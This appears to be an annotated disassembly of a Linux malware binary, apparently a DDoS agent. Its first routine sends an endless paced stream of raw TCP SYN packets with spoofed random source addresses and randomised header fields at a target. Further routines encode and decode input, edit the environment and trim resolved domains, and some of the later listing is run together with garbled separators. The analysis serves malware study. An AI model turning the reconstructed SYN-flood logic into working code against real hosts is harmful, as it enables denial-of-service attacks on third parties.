save_dd = dword ptr -0C8h
internal2 = dword ptr -0C4h ; = &var_58
sockfd = dword ptr -0C0h
save_sd = dword ptr -0BCh
save_sc = dword ptr -0B8h
save_sb = dword ptr -0B4h
save_sa = dword ptr -0B0h
save_dc = dword ptr -0ACh
save_db = dword ptr -0A8h
save_da = dword ptr -0A4h
checksum = word ptr -9Eh
ipaddr = dword ptr -9Ch
srcaddr_buf = byte ptr -98h
dstaddr_buf = byte ptr -78h
var_58 = byte ptr -58h ; TCP pseudo-header (0Ch bytes) followed by a copy of the TCP header
iphdr = byte ptr -38h
tcphdr = byte ptr -24h ; iphdr + 14h
dstaddr = byte ptr -10h
dstaddr_a = dword ptr 8
dstaddr_b = dword ptr 0Ch
dstaddr_c = dword ptr 10h
dstaddr_d = dword ptr 14h
dstport_hi = dword ptr 18h
dstport_lo = dword ptr 1Ch
use_srcaddr = dword ptr 20h
srcaddr_a = dword ptr 24h
srcaddr_b = dword ptr 28h
srcaddr_c = dword ptr 2Ch
srcaddr_d = dword ptr 30h
lookup_step = dword ptr 34h
use_dsthost = dword ptr 38h
dsthost = dword ptr 3Ch
        push ebp
        mov ebp, esp
        sub esp, 0CCh
        push edi
        push esi
        push ebx
        mov bl, byte ptr [ebp+dstaddr_a]
        mov byte ptr [ebp+save_da], bl
        mov bl, byte ptr [ebp+dstaddr_b]
        mov byte ptr [ebp+save_db], bl
        mov bl, byte ptr
[ebp+dstaddr_c] ; operand of the `mov bl, byte ptr` that ends the previous line
        ; sub_8049D40, continued (header and prologue are on the previous line).
        ; Only the low byte of each address argument is kept.
        mov byte ptr [ebp+save_dc], bl
        mov bl, byte ptr [ebp+dstaddr_d]
        mov byte ptr [ebp+save_dd], bl
        mov bl, byte ptr [ebp+srcaddr_a]
        mov byte ptr [ebp+save_sa], bl
        mov bl, byte ptr [ebp+srcaddr_b]
        mov byte ptr [ebp+save_sb], bl
        mov bl, byte ptr [ebp+srcaddr_c]
        mov byte ptr [ebp+save_sc], bl
        mov bl, byte ptr [ebp+srcaddr_d]
        mov byte ptr [ebp+save_sd], bl
        cmp [ebp+lookup_step], 0
        jz short loc_8049D9D
        dec [ebp+lookup_step] ; if (lookup_step) lookup_step--
loc_8049D9D: ; CODE XREF: sub_8049D40+58j
        push 0
        call time
        add esp, 4
        push eax
        call __srandom ; srandom(time(0))
        add esp, 4
        mov word ptr [ebp+dstaddr], 2 ; dstaddr.sin_family = AF_INET
        call __random
        mov ebx, 0FFh
        cdq
        idiv ebx
        mov eax, edx
        xchg al, ah
        mov word ptr [ebp+dstaddr+2], ax ; dstaddr.sin_port = htons(random() % 255)
        cmp [ebp+use_dsthost], 0
        jnz short loc_8049E0B
        movzx eax, byte ptr [ebp+save_dd]
        push eax
        movzx eax, byte ptr [ebp+save_dc]
        push eax
        movzx eax, byte ptr [ebp+save_db]
        push eax
        movzx eax, byte ptr [ebp+save_da]
        push eax
        push offset aD_D_D_D ; "%d.%d.%d.%d"
        lea ebx, [ebp+dstaddr_buf]
        push ebx
        call sprintf ; sprintf(dstaddr_buf, "%d.%d.%d.%d", dstaddr a, b, c, d)
        push ebx
        call inet_addr
        mov dword ptr [ebp+dstaddr+4], eax ; dstaddr.sin_addr.s_addr = inet_addr(dstaddr_buf)
        add esp, 1Ch
loc_8049E0B: ; CODE XREF: sub_8049D40+8Fj
        mov [ebp+iphdr], 45h ; version 4, header length 5 words
        mov word ptr [ebp+iphdr+2], 2800h ; tot_len field: bytes 00 28 = 40
        mov [ebp+iphdr+1], 0 ; tos = 0
        push 0FFh ; protocol 0xFF (255 = IPPROTO_RAW)
        push 3 ; SOCK_RAW
        push 2 ; PF_INET
        call socket ; socket(PF_INET, SOCK_RAW, 0xFF)
        mov [ebp+sockfd], eax
        add esp, 0Ch
        test eax, eax
        jle loc_804A178 ; sockfd <= 0: give up (descriptor 0 is treated as failure too)
        cmp [ebp+use_srcaddr], 0
        jz short loc_8049E72 ; no fixed source: srcaddr_buf is filled per packet instead
        movzx eax, byte ptr [ebp+save_sd]
        push eax
        movzx eax, byte ptr [ebp+save_sc]
        push eax
        movzx eax, byte ptr [ebp+save_sb]
        push eax
        movzx eax, byte ptr [ebp+save_sa]
        push eax
        push offset aD_D_D_D ; "%d.%d.%d.%d"
        lea eax, [ebp+srcaddr_buf]
        push eax
        call sprintf ; sprintf(srcaddr_buf, "%d.%d.%d.%d", srcaddr a, b, c, d)
        add esp, 18h
loc_8049E72: ; CODE XREF: sub_8049D40+FCj
        cmp [ebp+use_dsthost], 0
        jnz short loc_8049E87
        lea eax, [ebp+dstaddr_buf]
        push eax
        call inet_addr
        mov dword ptr [ebp+iphdr+10h], eax ; iphdr daddr = inet_addr(dstaddr_buf)
        add esp, 4
loc_8049E87: ; CODE XREF: sub_8049D40+136j
        mov word ptr [ebp+iphdr+6], 0 ; frag_off = 0
        mov [ebp+iphdr+9], 6 ; protocol = 6 (TCP)
        mov al, [ebp+tcphdr+0Dh]
        and al, 0EFh ; clear bit 10h of the flags byte
        mov [ebp+tcphdr+0Dh], al
        mov al, [ebp+tcphdr+0Ch]
        and al, 0Fh
        or al, 50h ; data offset = 5 words
        mov [ebp+tcphdr+0Ch], al
        mov dword ptr [ebp+tcphdr+8], 0 ; ack number = 0
        and al, 50h
        mov [ebp+tcphdr+0Ch], al ; offset/reserved byte = 50h
        mov [ebp+tcphdr+0Dh], 2 ; flags byte = 02h: SYN only
        mov word ptr [ebp+tcphdr+12h], 0 ; urgent pointer = 0
        mov eax, [ebp+dstport_hi]
        shl eax, 8
        add ax, word ptr [ebp+dstport_lo]
        xchg al, ah
        mov word ptr [ebp+tcphdr+2], ax ; destination port = htons((dstport_hi << 8) + dstport_lo)
        xor edi, edi ; edi = packets sent since the last usleep
        ; Pseudo-header for the TCP checksum, built in var_58.
        mov [ebp+var_58+8], 0 ; zero byte
        cmp [ebp+use_dsthost], 0
        jnz short loc_8049EDB
        mov eax, dword ptr [ebp+iphdr+10h]
        mov dword ptr [ebp+var_58+4], eax ; pseudo-header daddr
loc_8049EDB: ; CODE XREF: sub_8049D40+193j
        mov [ebp+var_58+9], 6 ; pseudo-header protocol = 6
        mov word ptr [ebp+var_58+0Ah], 1400h ; pseudo-header TCP length: bytes 00 14 = 20
        xor esi, esi ; esi = sends left before the next hostname lookup
        lea ebx, [ebp+var_58]
        mov [ebp+internal2], ebx
loc_8049EF0: ; CODE XREF: sub_8049D40+222j ; sub_8049D40+429j ...
        mov [ebp+internal1], 0 ; "lookup failed, retry" flag
        cmp [ebp+use_dsthost], 0
        jz short loc_8049F5B
        test esi, esi
        jg short loc_8049F5B
        mov ebx, [ebp+dsthost]
        push ebx
        call gethostbyname ; gethostbyname(dsthost)
        mov edx, eax
        add esp, 4
        test edx, edx
        jnz short loc_8049F30
        push 258h
        call sleep ; sleep(600) after a failed lookup
        mov [ebp+internal1], 1
        add esp, 4
        jmp short loc_8049F5B
; ---------------------------------------------------------------------------
        align 4
loc_8049F30: ; CODE XREF: sub_8049D40+1D4j
        push 4
        lea eax, [ebp+ipaddr]
        push eax
        mov eax, [edx+10h]
        mov eax, [eax]
        push eax
        call bcopy ; bcopy(he->h_addr_list[0], &ipaddr, 4)
        mov eax, [ebp+ipaddr]
        mov dword ptr [ebp+iphdr+10h], eax ; iphdr daddr
        mov dword ptr [ebp+dstaddr+4], eax ; dstaddr.sin_addr.s_addr
        mov dword ptr [ebp+var_58+4], eax ; pseudo-header daddr
        mov esi, 40000 ; reuse this result for the next 40000 paced sends
        add esp, 0Ch
loc_8049F5B: ; CODE XREF: sub_8049D40+1BEj ; sub_8049D40+1C2j ...
        cmp [ebp+internal1], 0
        jnz short loc_8049EF0
        ; Per-packet randomised fields.
        call random
        mov ebx, 3089
        cdq
        idiv ebx
        mov eax, edx
        add ah, 2 ; + 200h
        xchg al, ah
        mov word ptr [ebp+iphdr+4], ax ; IP id = htons(random() % 3089 + 512)
        call random
        mov ebx, 1401
        cdq
        idiv ebx
        mov eax, edx
        add ax, 200
        xchg al, ah
        mov word ptr [ebp+tcphdr+0Eh], ax ; window = htons(random() % 1401 + 200)
        call random
        mov ebx, 40000
        cdq
        idiv ebx
        mov eax, edx
        inc ax
        xchg al, ah
        mov word ptr [ebp+tcphdr], ax ; source port = htons(random() % 40000 + 1)
        call random
        mov ebx, 40000000
        cdq
        idiv ebx
        lea eax, [edx+1]
        xchg al, ah
        ror eax, 10h
        xchg al, ah ; the three instructions above byte-swap the dword
        mov dword ptr [ebp+tcphdr+4], eax ; sequence number = htonl(random() % 40000000 + 1)
        call random
        mov ebx, 116
        cdq
        idiv ebx
        add dl, 125
        mov [ebp+iphdr+8], dl ; ttl = 125 + random() % 116   (125..240)
        cmp [ebp+use_srcaddr], 0
        jnz short loc_804A01C
        ; No fixed source address: four random() % 255 octets for this packet.
        call __random
        mov ebx, 0FFh
        cdq
        idiv ebx
        push edx
        call __random
        cdq
        idiv ebx
        push edx
        call __random
        cdq
        idiv ebx
        push edx
        call __random
        cdq
        idiv ebx
        push edx
        push offset aU_U_U_U ; "%u.%u.%u.%u"
        lea eax, [ebp+srcaddr_buf]
        push eax
        call sprintf ; sprintf(srcaddr_buf, "%u.%u.%u.%u", r, r, r, r)
        add esp, 18h
loc_804A01C: ; CODE XREF: sub_8049D40+29Dj
        lea eax, [ebp+srcaddr_buf]
        push eax
        call inet_addr
        mov dword ptr [ebp+iphdr+0Ch], eax ; iphdr saddr = inet_addr(srcaddr_buf)
        mov dword ptr [ebp+var_58], eax ; pseudo-header saddr
        mov word ptr [ebp+tcphdr+10h], 0 ; TCP checksum = 0 before summing
        mov word ptr [ebp+iphdr+0Ah], 0 ; IP checksum = 0 before summing
        push 14h
        lea eax, [ebp+var_58+0Ch]
        push eax
        lea eax, [ebp+tcphdr]
        push eax
        call bcopy ; bcopy(tcphdr, var_58 + 0Ch, 14h)
        add esp, 10h
        ; TCP checksum: one's-complement sum over the 20h bytes at var_58
        ; (pseudo-header + TCP header), folded to 16 bits and inverted.
        mov edx, 20h
        mov ebx, [ebp+internal2]
        mov [ebp+internal1], ebx
        xor ecx, ecx
        mov [ebp+checksum], 0
loc_804A068: ; CODE XREF: sub_8049D40+342j
        mov ebx, [ebp+internal1]
        movzx eax, word ptr [ebx]
        add ecx, eax
        add ebx, 2
        mov [ebp+internal1], ebx
        add edx, 0FFFFFFFEh
        cmp edx, 1
        jg short loc_804A068
        jnz short loc_804A097
        mov al, [ebx]
        mov byte ptr [ebp+checksum], al
        movzx eax, [ebp+checksum]
        add ecx, eax
loc_804A097: ; CODE XREF: sub_8049D40+344j
        mov edx, ecx
        sar edx, 10h
        movzx eax, cx
        lea ecx, [eax+edx]
        mov eax, ecx
        sar eax, 10h
        add ecx, eax
        mov eax, ecx
        not ax
        mov [ebp+checksum], ax
        mov word ptr [ebp+tcphdr+10h], ax ; TCP checksum field
        ; IP header checksum over 14h bytes.
        mov edx, 14h
        lea ebx, [ebp+iphdr]
        mov [ebp+internal1], ebx
        xor ecx, ecx
        mov [ebp+checksum], 0
        lea esi, [esi]
loc_804A0D4: ; CODE XREF: sub_8049D40+3AEj
        mov ebx, [ebp+internal1]
        movzx eax, word ptr [ebx]
        add ecx, eax
        add ebx, 2
        mov [ebp+internal1], ebx
        add edx, 0FFFFFFFEh
        cmp edx, 1
        jg short loc_804A0D4
        jnz short loc_804A103
        mov al, [ebx]
        mov byte ptr [ebp+checksum], al
        movzx eax, [ebp+checksum]
        add ecx, eax
loc_804A103: ; CODE XREF: sub_8049D40+3B0j
        mov edx, ecx
        sar edx, 10h
        movzx eax, cx
        lea ecx, [eax+edx]
        mov eax, ecx
        sar eax, 10h
        add ecx, eax
        mov eax, ecx
        not ax
        mov [ebp+checksum], ax
        mov word ptr [ebp+iphdr+0Ah], ax ; IP checksum field
        push 16
        lea eax, [ebp+dstaddr]
        push eax
        push 0
        push 40
        lea eax, [ebp+iphdr]
        push eax
        mov ebx, [ebp+sockfd]
        push ebx
        call sendto ; sendto(sockfd, iphdr, 40, 0, &dstaddr, 16)
        add esp, 18h
        ; Pacing: usleep(300) after every packet when lookup_step == 0, otherwise
        ; only once edi has counted up to lookup_step.
        cmp [ebp+lookup_step], 0
        jnz short loc_804A154
        push 12Ch
        call usleep ; usleep(300)
        jmp short loc_804A165
; ---------------------------------------------------------------------------
loc_804A154: ; CODE XREF: sub_8049D40+406j
        cmp [ebp+lookup_step], edi
        jnz short loc_804A170
        push 12Ch
        call usleep ; usleep(300)
        xor edi, edi
loc_804A165: ; CODE XREF: sub_8049D40+412j
        dec esi ; one paced send closer to the next gethostbyname()
        add esp, 4
        jmp loc_8049EF0
; ---------------------------------------------------------------------------
        db 8Dh, 36h
; ---------------------------------------------------------------------------
loc_804A170: ; CODE XREF: sub_8049D40+417j
        inc edi
        jmp loc_8049EF0 ; there is no normal exit from this loop
; ---------------------------------------------------------------------------
        db 8Dh, 36h
; ---------------------------------------------------------------------------
loc_804A178: ; CODE XREF: sub_8049D40+F2j
        mov ds:child_pid, 0 ; child_pid = 0
        xor eax, eax ; return 0
        lea esp, [ebp+saved_regs] ; cleanup & restore the stack
        pop ebx
        pop esi
        pop edi
        mov esp, ebp
        pop ebp
        retn
sub_8049D40 endp
; ---------------------------------------------------------------------------
        db 8Dh, 76h, 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame hidden
;
; encode_input(arg_0 = length, arg_4 = src, arg_8 = dest)
;   Running-sum byte encoding, all arithmetic modulo 256:
;     dest[0] = src[0] + 17h
;     dest[i] = dest[i-1] + src[i] + 17h        for 1 <= i < length
;   decode_input (the next routine) undoes it:
;     src[i] = dest[i] - dest[i-1] - 17h.
;   The loop ends only when i == length and i starts at 1, so a length of 0
;   is not handled; no bound on dest is checked in this routine.
encode_input proc near ; CODE XREF: main+286p main+582p
var_C = byte ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
        push ebp
        mov ebp, esp
        push edi
        push esi
        push ebx
        mov edi, [ebp+arg_0] ; edi = length
        mov esi, [ebp+arg_4] ; esi = src
        mov ebx, [ebp+arg_8] ; ebx = dest
        mov al, ds:null_byte ; al = null_byte (presumably 0; its value is not shown here)
        mov [ebx], al ; dest[0] = null_byte
        mov al, [esi] ; put 1st byte of src in al
        add al, 17h ; add 0x17 to it
        movsx eax, al ; sign-extend for the %c argument
        push eax ; 1st byte of src + 0x17
        push offset aC ; "%c"
        push ebx ; dest
        call sprintf ; sprintf(dest, "%c", src[0] + 0x17)
        mov ecx, 1 ; i = 1
        cmp
ecx, edi ; operands of the `cmp` that ends the previous line: i == length ?
        ; encode_input, continued.  Registers: edi = length, esi = src,
        ; ebx = dest, ecx = i.
        jz short loc_804A1DD ; length == 1: only dest[0] is produced
        nop
loc_804A1C8: ; CODE XREF: encode_input+47j
        movzx edx, byte ptr [ebx+ecx-1] ; edx = dest[i - 1]
        movzx eax, byte ptr [ecx+esi] ; eax = src[i]
        lea eax, [edx+eax+17h] ; eax = src[i] + dest[i - 1] + 0x17
        mov [ecx+ebx], al ; dest[i] = eax truncated to byte
        inc ecx ; i++
        cmp ecx, edi
        jnz short loc_804A1C8 ; repeat until i == length
loc_804A1DD: ; CODE XREF: encode_input+31j
        lea esp, [ebp+var_C]
        pop ebx
        pop esi
        pop edi
        mov esp, ebp
        pop ebp
        retn
encode_input endp
; ---------------------------------------------------------------------------
        align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame hidden
;
; decode_input(arg_0 = length, arg_4 = src, arg_8 = dest)
;   Inverse of the running-sum encoding produced by encode_input:
;     plain[0] = src[0] - 17h
;     plain[i] = src[i] - src[i-1] - 17h        (mod 256)
;   Bytes are recovered from index length-1 down to 0.  For each one, dest is
;   copied to a scratch buffer, shifted right by one, and then rebuilt with
;   sprintf(dest, "%c%s", byte, scratch), i.e. the new byte is prepended.
;   The scratch buffer is carved from the stack with a size taken from
;   length (rounded up to a multiple of 4); this routine checks no upper
;   bound on length.
decode_input proc near ; CODE XREF: main+1D8p
var_10 = byte ptr -10h
var_4 = dword ptr -4 ; pointer to the stack scratch buffer
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
        push ebp
        mov ebp, esp
        sub esp, 4
        push edi
        push esi
        push ebx
        mov edi, [ebp+arg_0] ; edi = length (ex. 200)
        lea ebx, [edi-1] ; ebx = length - 1 (ex. 199): index of the byte being decoded
        lea eax, [edi+3] ; eax = length + 3 (ex. 203)
        and al, 0FCh ; clear the low two bits: length rounded up to a multiple of 4
        sub esp, eax ; alloca()
        mov [ebp+var_4], esp ; store alloca() result in workbuf
        mov al, ds:null_byte ; al = null_byte (presumably 0; its value is not shown here)
        mov esi, [ebp+arg_8] ; offset to first byte of dest buffer
        mov [esi], al ; dest[0] = null_byte: dest starts out as an empty string
        test ebx, ebx
        jl loc_804A29B ; length - 1 < 0: nothing to decode, return
loc_804A214: ; CODE XREF: decode_input+ADj
        lea edx, [ebx-1] ; edx = ebx - 1
        test ebx, ebx
        jz short loc_804A22C ; index 0 has no predecessor
        mov esi, [ebp+arg_4]
        movzx eax, byte ptr [ebx+esi] ; eax = src[ebx]
        movzx edx, byte ptr [edx+esi] ; edx = src[ebx - 1]
        sub eax, edx ; eax = src[ebx] - src[ebx - 1]
        jmp short loc_804A232
; ---------------------------------------------------------------------------
        db 8Dh, 36h
; ---------------------------------------------------------------------------
loc_804A22C: ; CODE XREF: decode_input+31j
        mov esi, [ebp+arg_4]
        movzx eax, byte ptr [esi] ; eax = src[0]
loc_804A232: ; CODE XREF: decode_input+40j
        lea ecx, [eax-17h] ; ecx = difference - 0x17
        test ecx, ecx
        jge short loc_804A244
        db 8Dh,76h,0 ; lea esi, [esi+0] ; compiler artifact
loc_804A23C: ; CODE XREF: decode_input+5Aj
        add ecx, 100h ; while (ecx < 0) ecx += 256
        js short loc_804A23C
loc_804A244: ; CODE XREF: decode_input+4Fj
        xor edx, edx
        cmp edx, edi ; compiler artifact
        jge short loc_804A25D ; compiler artifact
        lea esi, [esi] ; compiler artifact
loc_804A24C: ; CODE XREF: decode_input+73j
        ; workbuf[0..length) = dest[0..length)
        mov esi, [ebp+arg_8]
        mov al, [edx+esi]
        mov esi, [ebp+var_4]
        mov [edx+esi], al
        inc edx
        cmp edx, edi
        jl short loc_804A24C
loc_804A25D: ; CODE XREF: decode_input+60j
        mov esi, [ebp+arg_8]
        mov [esi], cl ; dest[0] = decoded byte
        mov edx, 1
        cmp edx, edi
        jge short loc_804A27E
        nop
loc_804A26C: ; CODE XREF: decode_input+94j
        ; dest[k] = workbuf[k - 1] for 1 <= k < length (shift right by one)
        mov esi, [ebp+var_4]
        mov al, [edx+esi-1]
        mov esi, [ebp+arg_8]
        mov [edx+esi], al
        inc edx
        cmp edx, edi
        jl short loc_804A26C
loc_804A27E: ; CODE XREF: decode_input+81j
        mov esi, [ebp+var_4]
        push esi ; workbuf
        push ecx ; decoded byte
        push offset aCS ; "%c%s"
        mov esi, [ebp+arg_8]
        push esi ; dest
        call sprintf ; sprintf(dest, "%c%s", decoded byte, workbuf)
        add esp, 10h
        dec ebx
        jns loc_804A214 ; continue down to index 0
loc_804A29B: ; CODE XREF: decode_input+26j
        lea esp, [ebp+var_10] ; also releases the alloca() area
        pop ebx
        pop esi
        pop edi
        mov esp, ebp
        pop ebp
        retn
decode_input endp
; ---------------------------------------------------------------------------
        db 3 dup(90h)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame hidden
;
; setenv(arg_0, arg_4, arg_8) - from their use below the arguments act as
; (name, value, overwrite).  NOTE(review): this looks like a statically
; linked C library routine rather than code specific to this program - confirm.
;   Searches __environ for an entry beginning with name followed by '='.
;   Not found: allocates a pointer array one slot larger, appends a new
;     "name=value" string, frees the array recorded in dword_80784F4 (if
;     any) and installs the new one.
;   Found: returns unchanged when arg_8 == 0; otherwise rewrites the entry,
;     allocating a new string only when the old one is too short.
;   Returns var_10: 0, or -1 when an allocation fails.
setenv proc near ; CODE XREF: main+946p main+964p
var_24 = byte ptr -24h
var_14 = dword ptr -14h
var_10 = dword ptr -10h ; return value
var_C = dword ptr -0Ch ; strlen(arg_4)
var_8 = dword ptr -8 ; strlen(arg_0)
var_4 = dword ptr -4 ; number of entries walked in __environ
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
        push ebp
        mov ebp, esp
        sub esp, 18h
        push edi
        push esi
        push ebx
        xor dl, dl
        mov edi, [ebp+arg_0]
        mov al, dl
        cld
        mov ecx, 0FFFFFFFFh
        repne scasb
        not ecx
        mov esi, ecx
        dec esi
        mov [ebp+var_8], esi ; var_8 = strlen(arg_0)
        mov edi, [ebp+arg_4]
        cld
        mov ecx, 0FFFFFFFFh
        repne scasb
        not ecx
        mov eax, ecx
        dec eax
        mov [ebp+var_C], eax ; var_C = strlen(arg_4)
        mov [ebp+var_10], 0 ; default return value 0
        mov [ebp+var_4], 0
        mov ebx, __environ
        cmp dword ptr [ebx], 0
        jz short loc_804A322 ; empty environment: go straight to the append path
loc_804A2F4: ; CODE XREF: setenv+6Fj
        mov esi, [ebx]
        mov edi, [ebp+arg_0]
        mov ecx, [ebp+var_8]
        cld
        test al, 0 ; sets ZF so that a zero-length compare counts as equal
        repe cmpsb ; compare the first var_8 bytes of the entry with arg_0
        jnz short
loc_804A30E mov esi, [ebx] mov eax, [ebp+var_8] cmp byte ptr [eax+esi], 3Dh jz short loc_804A319 loc_804A30E: ; CODE XREF: setenv+59j inc [ebp+var_4] add ebx, 4 cmp dword ptr [ebx], 0 jnz short loc_804A2F4 loc_804A319: ; CODE XREF: setenv+64j cmp dword ptr [ebx], 0 jnz loc_804A408 loc_804A322: ; CODE XREF: setenv+4Aj mov esi, [ebp+var_4] lea esi, ds:8[esi*4] push esi call malloc mov ebx, eax add esp, 4 test ebx, ebx jz short loc_804A384 mov eax, __environ mov esi, [ebp+var_4] lea edx, ds:0[esi*4] push edx push eax push ebx call memcpy add esp, 0Ch mov eax, [ebp+var_C] mov esi, [ebp+var_8] lea eax, [esi+eax+2] push eax call malloc mov edx, eax mov esi, [ebp+var_4] mov [ebx+esi*4], edx add esp, 4 test edx, edx jnz short loc_804A390 push ebx call free mov __errno, 0Ch loc_804A384: ; CODE XREF: setenv+91j setenv+19Bj mov [ebp+var_10], 0FFFFFFFFh jmp loc_804A47F ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804A390: ; CODE XREF: setenv+CAj mov eax, [ebp+var_4] mov eax, [ebx+eax*4] mov [ebp+var_14], eax mov esi, [ebp+var_8] push esi mov eax, [ebp+arg_0] push eax mov esi, [ebp+var_14] push esi call memcpy add esp, 0Ch mov eax, [ebp+var_4] mov eax, [ebx+eax*4] mov esi, [ebp+var_8] mov byte ptr [esi+eax], 3Dh mov edx, [ebp+var_C] inc edx mov eax, [ebp+var_4] add esi, [ebx+eax*4] inc esi mov [ebp+var_14], esi push edx mov esi, [ebp+arg_4] push esi mov eax, [ebp+var_14] push eax call memcpy add esp, 0Ch mov esi, [ebp+var_4] mov dword ptr [ebx+esi*4+4], 0 cmp dword_80784F4, 0 jz short loc_804A3F8 mov eax, dword_80784F4 push eax call free loc_804A3F8: ; CODE XREF: setenv+143j mov dword_80784F4, ebx mov __environ, ebx jmp short loc_804A47F ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804A408: ; CODE XREF: setenv+74j cmp [ebp+arg_8], 0 jz short loc_804A47F xor dl, dl mov edi, [ebx] mov al, dl cld mov ecx, 0FFFFFFFFh repne scasb not ecx mov esi, ecx dec esi mov [ebp+var_14], esi mov eax, [ebp+var_C] mov esi, [ebp+var_8] lea edx, 
[esi+eax+1] cmp [ebp+var_14], edx jnb short loc_804A44B lea eax, [edx+1] push eax call malloc mov edx, eax add esp, 4 test edx, edx jz loc_804A384 mov [ebx], edx loc_804A44B: ; CODE XREF: setenv+189j mov eax, [ebx] mov [ebp+var_14], eax mov esi, [ebp+var_8] push esi mov eax, [ebp+arg_0] push eax mov esi, [ebp+var_14] push esi call memcpy add esp, 0Ch mov eax, [ebx] mov esi, [ebp+var_8] mov byte ptr [esi+eax], 3Dh mov edx, [ebp+var_C] inc edx add esi, [ebx] inc esi push edx mov eax, [ebp+arg_4] push eax push esi call memcpy loc_804A47F: ; CODE XREF: setenv+E3j setenv+15Cj ... mov eax, [ebp+var_10] lea esp, [ebp+var_24] pop ebx pop esi pop edi mov esp, ebp pop ebp retn setenv endp ; 栩栩栩栩栩栩栩 S U B R O U T I N E 栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩 ; Attributes: bp-based frame hidden unsetenv proc near ; CODE XREF: main+953p var_10 = byte ptr -10h var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 4 push edi push esi push ebx xor al, al mov edi, [ebp+arg_0] cld mov ecx, 0FFFFFFFFh repne scasb mov eax, ecx not eax dec eax mov [ebp+var_4], eax mov ebx, __environ mov edx, ebx cmp dword ptr [ebx], 0 jz short loc_804A4E1 nop loc_804A4B8: ; CODE XREF: unsetenv+53j mov esi, [edx] mov edi, [ebp+arg_0] mov ecx, [ebp+var_4] cld test al, 0 repe cmpsb jnz short loc_804A4D2 mov eax, [edx] mov esi, [ebp+var_4] cmp byte ptr [esi+eax], 3Dh jz short loc_804A4D9 loc_804A4D2: ; CODE XREF: unsetenv+39j mov eax, [edx] mov [ebx], eax add ebx, 4 loc_804A4D9: ; CODE XREF: unsetenv+44j add edx, 4 cmp dword ptr [edx], 0 jnz short loc_804A4B8 loc_804A4E1: ; CODE XREF: unsetenv+29j mov dword ptr [ebx], 0 lea esp, [ebp+var_10] pop ebx pop esi pop edi mov esp, ebp pop ebp retn unsetenv endp ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 3 dup(90h) ; 栩栩栩栩栩栩栩 S U B R O U T I N E 栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩 ; Attributes: bp-based frame hidden dotrimdomain proc near ; CODE XREF: trim_domains+14p ; trim_domains+2Cp ... 
var_14 = byte ptr -14h var_8 = dword ptr -8 arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 8 push edi push esi push ebx xor esi, esi cmp dword_8078520, esi jle short loc_804A574 nop loc_804A508: ; CODE XREF: dotrimdomain+7Ej mov eax, ds:dword_807A348[esi*4] mov [ebp+var_8], eax mov edi, [ebp+var_8] xor al, al cld mov ecx, 0FFFFFFFFh repne scasb not ecx mov ebx, ecx dec ebx mov edi, [ebp+arg_0] cld mov ecx, 0FFFFFFFFh repne scasb not ecx dec ecx cmp ecx, ebx jle short loc_804A56B mov edx, [ebp+var_8] push edx add ecx, [ebp+arg_0] mov eax, ecx sub eax, ebx push eax call sub_80565F8 mov ecx, eax add esp, 8 test ecx, ecx jnz short loc_804A56B mov edi, [ebp+arg_0] xor al, al cld mov ecx, 0FFFFFFFFh repne scasb not ecx mov edx, ecx dec edx sub edx, ebx mov eax, [ebp+arg_0] mov byte ptr [edx+eax], 0 loc_804A56B: ; CODE XREF: dotrimdomain+40j ; dotrimdomain+5Aj inc esi cmp dword_8078520, esi jg short loc_804A508 loc_804A574: ; CODE XREF: dotrimdomain+11j lea esp, [ebp+var_14] pop ebx pop esi pop edi mov esp, ebp pop ebp retn dotrimdomain endp ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 栩栩栩栩栩栩栩 S U B R O U T I N E 栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩 ; Attributes: bp-based frame hidden trim_domains proc near ; CODE XREF: gethostbyname+285p ; gethostbyaddr+281p var_8 = byte ptr -8 arg_0 = dword ptr 8 push ebp mov ebp, esp push esi push ebx mov esi, [ebp+arg_0] cmp dword_8078520, 0 jz short loc_804A5BE mov eax, [esi] push eax call dotrimdomain xor ebx, ebx add esp, 4 mov eax, [esi+4] cmp dword ptr [eax], 0 jz short loc_804A5BE lea esi, [esi] loc_804A5A8: ; CODE XREF: trim_domains+3Cj mov eax, [eax+ebx*4] push eax call dotrimdomain add esp, 4 inc ebx mov eax, [esi+4] cmp dword ptr [eax+ebx*4], 0 jnz short loc_804A5A8 loc_804A5BE: ; CODE XREF: trim_domains+Fj ; trim_domains+24j mov eax, esi lea esp, [ebp+var_8] pop ebx pop esi mov esp, ebp pop ebp retn trim_domains endp ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 栩栩栩栩栩栩栩 S U B R O U T I N E 栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩 ; 
Attributes: bp-based frame hidden
; (the line above is the text of IDA's "; Attributes:" banner comment; its
; leading ';' sits at the end of the preceding line of this listing)
;
; reorder_addrs(arg_0)
;
; Phase 1, run only while dword_8078524 == -1: open socket(2, 1, 0), fetch
; the interface list with ioctl 8912h (SIOCGIFCONF on Linux) and, for every
; 20h-byte record whose address family is 2 (AF_INET), query the netmask
